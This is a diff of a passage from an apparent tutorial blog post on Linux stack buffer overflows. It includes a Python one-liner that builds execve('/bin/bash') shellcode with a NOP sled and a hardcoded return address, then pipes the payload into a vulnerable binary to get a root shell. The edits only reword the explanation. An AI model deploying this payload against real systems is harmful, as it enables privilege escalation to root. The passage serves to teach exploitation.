Reboare/Lagrange/_posts/2017-12-26-linux-stack-bof-1.md

 python -c "from struct import pack; print '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'.ljust(140,'\x90') +  pack('<L', 0xffffcfd0)"  > /tmp/var
 ```

 You'll notice here I've used ljust on the shellcode.
-This just pads the string to the determined length of 128 and pads it with NOP instructions, so it makes the process of creating a nopsled slightly easier.
-Run the binary, inputting the payload, we are returned a root shell.
-The uid won't change but the [effective-uid](https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id) does, indicating we now have root privileges.
+This just pads the string to the determined length of 140 and pads it with NOP instructions, so it makes the process of creating a nopsled slightly easier.
+For example, if we were to replace the shellcode, no other adjustments would be necessary.

+We run the binary, inputting the payload, and we are returned a root shell.
+The uid won't change but the [effective-uid](https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id) or the euid does, meaning we now have root privileges.

 ```bash
 ubuntu@ubuntu:/tmp$ (cat /tmp/var; cat) | ./test